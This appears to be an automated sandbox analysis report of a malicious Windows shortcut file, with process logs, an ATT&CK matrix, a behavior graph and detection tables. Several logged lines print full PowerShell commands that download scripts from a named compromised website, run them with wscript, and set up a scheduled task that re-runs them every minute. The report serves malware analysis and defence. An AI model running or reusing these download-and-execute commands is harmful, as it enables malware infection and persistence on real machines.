      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2324Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1132Thread sleep time: -13835058055282155s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1812Thread sleep time: -1844674407370954s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1512Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5952Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: powershell.exe, 00000005.00000002.2435422107.000002662F760000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
      Source: powershell.exe, 00000014.00000002.2979933284.00000214D4BD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
      Source: wscript.exe, 00000013.00000003.2780806711.0000015B0FA19000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: wscript.exe, 00000004.00000002.2185535140.000001EE7BCD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
      Source: wscript.exe, 00000013.00000003.2780806711.0000015B0FA19000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
      Source: powershell.exe, 00000000.00000002.2196342208.00000199ECA90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWI
      Source: powershell.exe, 00000008.00000002.2417758469.00000152696C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=
      Source: wscript.exe, 00000007.00000002.2209969102.0000020281A17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\x
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Yara detected Powershell download and execute
      Source: Yara matchFile source: amsi64_5464.amsi.csv, type: OTHER
      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5464, type: MEMORYSTR
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js " /tn HAoyOEGl0Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\241XU6KV2DFH.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn EB3Vk0QhrcN4wn.js /f; wscript $env:programdata\241XU6KV2DFH.js "Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn EB3Vk0QhrcN4wn.js /fJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\ProgramData\241XU6KV2DFH.jsJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\241XU6KV2DFH.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn EB3Vk0QhrcN4wn.js /f; wscript $env:programdata\241XU6KV2DFH.js "
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn EB3Vk0QhrcN4wn.js /f
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\ProgramData\241XU6KV2DFH.js
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\241XU6KV2DFH.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn EB3Vk0QhrcN4wn.js /f; wscript $env:programdata\241XU6KV2DFH.js "
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn EB3Vk0QhrcN4wn.js /f
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\ProgramData\241XU6KV2DFH.js
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -comman [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $s9ijkyolgfnn3 = new-object net.webclient; $cio = $s9ijkyolgfnn3.downloaddata('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicutsqo.php'); $s9ijkyolgfnn3.downloadfile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxh2dz.php', 'eb3vk0qhrcn4wn.js'); schtasks /create /sc minute /mo 1 /f /tr ([system.text.encoding]::utf8.getstring($cio) + $env:tmp + '\' + ('eb3vk0qhrcn4wn.js ' * 2)) /tn haoyoegl0;
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "iwr -outfi $env:programdata\241xu6kv2dfh.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretpf.php'; schtasks /delete /tn eb3vk0qhrcn4wn.js /f; wscript $env:programdata\241xu6kv2dfh.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "iwr -outfi $env:programdata\241xu6kv2dfh.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretpf.php'; schtasks /delete /tn eb3vk0qhrcn4wn.js /f; wscript $env:programdata\241xu6kv2dfh.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "iwr -outfi $env:programdata\241xu6kv2dfh.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretpf.php'; schtasks /delete /tn eb3vk0qhrcn4wn.js /f; wscript $env:programdata\241xu6kv2dfh.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "iwr -outfi $env:programdata\241xu6kv2dfh.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretpf.php'; schtasks /delete /tn eb3vk0qhrcn4wn.js /f; wscript $env:programdata\241xu6kv2dfh.js "Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "iwr -outfi $env:programdata\241xu6kv2dfh.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretpf.php'; schtasks /delete /tn eb3vk0qhrcn4wn.js /f; wscript $env:programdata\241xu6kv2dfh.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "iwr -outfi $env:programdata\241xu6kv2dfh.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretpf.php'; schtasks /delete /tn eb3vk0qhrcn4wn.js /f; wscript $env:programdata\241xu6kv2dfh.js "
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information21
      Scripting      		Valid Accounts1
      Command and Scripting Interpreter      		1
      Scheduled Task/Job      		11
      Process Injection      		21
      Virtualization/Sandbox Evasion      		OS Credential Dumping11
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		11
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Scheduled Task/Job      		21
      Scripting      		1
      Scheduled Task/Job      		11
      Process Injection      		LSASS Memory11
      Process Discovery      		Remote Desktop ProtocolData from Removable Media1
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      Exploitation for Client Execution      		1
      DLL Side-Loading      		1
      DLL Side-Loading      		1
      Obfuscated Files or Information      		Security Account Manager21
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive2
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal Accounts2
      PowerShell      		Login HookLogin Hook1
      DLL Side-Loading      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput Capture13
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
      File and Directory Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
      System Information Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1567190 Sample: mX3IqRiuFo.lnk Startdate: 03/12/2024 Architecture: WINDOWS Score: 100 50 www.italialife24.it 2->50 52 italialife24.it 2->52 56 Malicious sample detected (through community Yara rule) 2->56 58 Windows shortcut file (LNK) starts blacklisted processes 2->58 60 Multi AV Scanner detection for submitted file 2->60 62 13 other signatures 2->62 8 wscript.exe 1 1 2->8         started        11 wscript.exe 2->11         started        13 wscript.exe 2->13         started        15 powershell.exe 14 20 2->15         started        signatures3 process4 dnsIp5 66 Windows shortcut file (LNK) starts blacklisted processes 8->66 68 Suspicious powershell command line found 8->68 70 Wscript starts Powershell (via cmd or directly) 8->70 74 2 other signatures 8->74 19 powershell.exe 15 8->19         started        21 powershell.exe 11->21         started        23 powershell.exe 13->23         started        54 italialife24.it 46.254.34.201, 443, 49709, 49710 SERVERPLAN-ASIT Italy 15->54 48 C:\Users\user\AppData\...B3Vk0QhrcN4wn.js, ASCII 15->48 dropped 72 Uses schtasks.exe or at.exe to add and modify task schedules 15->72 25 conhost.exe 1 15->25         started        27 schtasks.exe 1 15->27         started        file6 signatures7 process8 process9 29 conhost.exe 19->29         started        31 schtasks.exe 1 19->31         started        33 wscript.exe 19->33         started        35 wscript.exe 21->35         started        38 conhost.exe 21->38         started        40 schtasks.exe 1 21->40         started        42 conhost.exe 23->42         started        44 schtasks.exe 1 23->44         started        46 wscript.exe 23->46         started        signatures10 64 Windows Scripting host queries suspicious COM object (likely to drop second stage) 35->64

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      mX3IqRiuFo.lnk46%ReversingLabsShortcut.Trojan.Pantera
      mX3IqRiuFo.lnk53%VirustotalBrowse
      mX3IqRiuFo.lnk100%Joe Sandbox ML

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.phpr0%Avira URL Cloudsafe
      https://www.italialife24.it0%Avira URL Cloudsafe
      https://www.italialife24.it/wp-content/uploads/2021/05/unt0%Avira URL Cloudsafe
      http://www.microsoft.co)0%Avira URL Cloudsafe
      https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php0%Avira URL Cloudsafe
      https://www.italialife24.it/0%Avira URL Cloudsafe
      https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php0%Avira URL Cloudsafe
      https://www.italialife24.it/wp-content/uploads/2021/00%Avira URL Cloudsafe
      https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.ph0%Avira URL Cloudsafe
      https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php0%Avira URL Cloudsafe
      https://www.italialife24.it/wp-content0%Avira URL Cloudsafe
      https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps10%Avira URL Cloudsafe
      https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php0%Avira URL Cloudsafe
      http://italialife24.it0%Avira URL Cloudsafe
      http://www.italialife24.it0%Avira URL Cloudsafe
      https://www.italialife24.it/wp-c0%Avira URL Cloudsafe
      https://www.italialife24.it/wp-content/uploads/2021/05/a0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      italialife24.it
      		46.254.34.201
      		truetrue
        		unknown
        www.italialife24.it
        		unknown
        		unknowntrue
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.phptrue
          • Avira URL Cloud: safe
          		unknown
          https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.phptrue
          • Avira URL Cloud: safe
          		unknown
          https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.phptrue
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://www.italialife24.itpowershell.exe, 00000000.00000002.2169173026.0000019981699000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2169173026.0000019981248000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2252312929.0000026618795000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2245540270.0000015252752000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2833335947.00000214BDC60000.00000004.00000800.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          		unknown
          http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.2189643133.00000199901B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2169173026.0000019981A12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2189643133.000001999006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2252312929.0000026618E67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2415007234.0000026627741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2415007234.000002662760B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2245540270.0000015252CE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2398207318.00000152615C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2398207318.000001526148B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2833335947.00000214BE2E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2964143111.00000214CCACA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2964143111.00000214CC987000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000000.00000002.2169173026.0000019981757000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2252312929.0000026618B9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2245540270.0000015252A57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2833335947.00000214BDF65000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.phprpowershell.exe, 00000000.00000002.2195200172.00000199EC7C8000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000014.00000002.2833335947.00000214BE174000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000014.00000002.2833335947.00000214BE174000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.phpwscript.exe, 00000017.00000002.2856582097.0000020104925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000017.00000003.2854626485.00000201046CC000.00000004.00000020.00020000.00000000.sdmp, 241XU6KV2DFH.js.8.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://go.micropowershell.exe, 00000000.00000002.2169173026.0000019981248000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2252312929.0000026618795000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2245540270.000001525203C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2833335947.00000214BD54B000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
